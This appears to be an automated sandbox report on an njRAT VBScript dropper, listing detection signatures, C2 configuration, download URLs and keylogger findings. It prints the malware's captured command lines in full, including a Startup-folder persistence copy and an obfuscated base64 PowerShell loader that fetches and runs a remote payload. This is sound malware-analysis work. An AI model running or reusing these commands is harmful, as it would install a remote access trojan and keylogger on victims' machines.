Windows Analysis Report
NJratccccassssG2.00.vbs

Overview

General Information

Sample Name: NJratccccassssG2.00.vbs
Analysis ID: 575468
MD5: 4833452ece935ea45c3b0912db2fc0bd
SHA1: 111ba6889be1031376e62b1e87dd83041ace2352
SHA256: 965b43f6e33c4b12172f54bd6361f892a3c7f8aa6d75ac3a8665b090ff9d819f
Infos:

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected Njrat
Antivirus detection for URL or domain
Sigma detected: Encoded FromBase64String
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Sigma detected: FromBase64String Command Line
Sigma detected: Suspicious Encoded PowerShell Command Line
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Uses ping.exe to sleep
Sigma detected: Suspicious PowerShell Cmdline
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection
barindex
Found malware configuration
Source: 22.0.RegSvcs.exe.400000.1.unpack Malware Configuration Extractor: Njrat {"Host": "venomsi.mypsx.net", "Port": "81", "Mutex Name": "4c6c9a1bbdc34e6ebe", "Network Seprator": "@!#&^%$", "Campaign ID": "NYAN CAT", "Version": "0.7NC"}
Multi AV Scanner detection for submitted file
Source: NJratccccassssG2.00.vbs Virustotal: Detection: 29% Perma Link
Source: NJratccccassssG2.00.vbs Metadefender: Detection: 14% Perma Link
Source: NJratccccassssG2.00.vbs ReversingLabs: Detection: 25%
Yara detected Njrat
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://198.50.177.251/rump/4.txt Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: venomsi.mypsx.net Virustotal: Detection: 10% Perma Link
Source: venomsi.mypsx.net Virustotal: Detection: 10% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 22.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Dropper.Gen7
Source: 22.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Dropper.Gen7
Source: Binary string: e.pdb source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdbCk source: powershell.exe, 00000018.00000002.403195364.0000019760B80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationlib.pdb/E source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Hacking\Crypters Modding\ClassLibrary3\ClassLibrary3\obj\Release\lpOUplMp.pdb source: powershell.exe, 00000010.00000002.354455208.000002164DC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: jICudHOL.pdb source: powershell.exe, 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357618096.0000021665FB0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: venomsi.mypsx.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX UninetSAdeCVMX
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rump/4.txt HTTP/1.1Host: 198.50.177.251Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NJratNEW%20casa/base%2064%20NJratNEWcasa.txt HTTP/1.1Host: njratcasanew.ueuo.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.50.177.251 198.50.177.251
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49757 -> 201.121.59.253:81
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: powershell.exe, 00000010.00000002.354766020.000002164DE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.50.177.251
Source: powershell.exe, 00000010.00000002.354777323.000002164DE74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.50.177.251x
Source: powershell.exe, 0000000C.00000002.314810169.000001A335168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.360150499.0000021C40217000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.365228820.0000021C40217000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.352999844.0000021665AEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357064949.0000021665AEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.382539354.00000197607B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.402988947.00000197607B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000010.00000002.354814544.000002164DEBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://njratcasanew.ueuo.com
Source: powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://njratcasanew.ueuo.com/NJratNEW%20casa/base%2064%20NJratNEWcasa.txt
Source: powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://njratcasanew.ueuo.comx
Source: powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.313842082.000001A31D141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.361050610.0000021C28191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.353960268.000002164D941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.387789154.0000019748581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: njratcasanew.ueuo.com
Source: global traffic HTTP traffic detected: GET /rump/4.txt HTTP/1.1Host: 198.50.177.251Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NJratNEW%20casa/base%2064%20NJratNEWcasa.txt HTTP/1.1Host: njratcasanew.ueuo.comConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 22.0.RegSvcs.exe.400000.1.unpack, Keylogger.cs .Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.3.unpack, Keylogger.cs .Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.2.unpack, Keylogger.cs .Net Code: VKCodeToUnicode
Source: 22.2.RegSvcs.exe.400000.0.unpack, Keylogger.cs .Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.0.unpack, Keylogger.cs .Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.4.unpack, Keylogger.cs .Net Code: VKCodeToUnicode

E-Banking Fraud
barindex
Yara detected Njrat
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 16.2.powershell.exe.21665e70000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 16.2.powershell.exe.2164dccfa28.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6844, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
